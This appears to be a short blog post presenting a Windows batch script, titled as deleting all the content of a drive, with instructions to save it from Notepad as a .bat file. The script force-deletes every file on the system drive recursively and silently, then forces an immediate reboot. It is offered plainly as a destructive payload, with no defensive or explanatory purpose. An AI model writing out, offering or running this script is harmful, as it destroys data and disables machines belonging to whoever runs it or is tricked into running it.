Skip to main content

Deletes All The Content Of A Drive

open notepad and write the following code and save them as (name.bat) file.

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

  Save The Above Code in a .bat file.
_________________________

Comments

Popular posts from this blog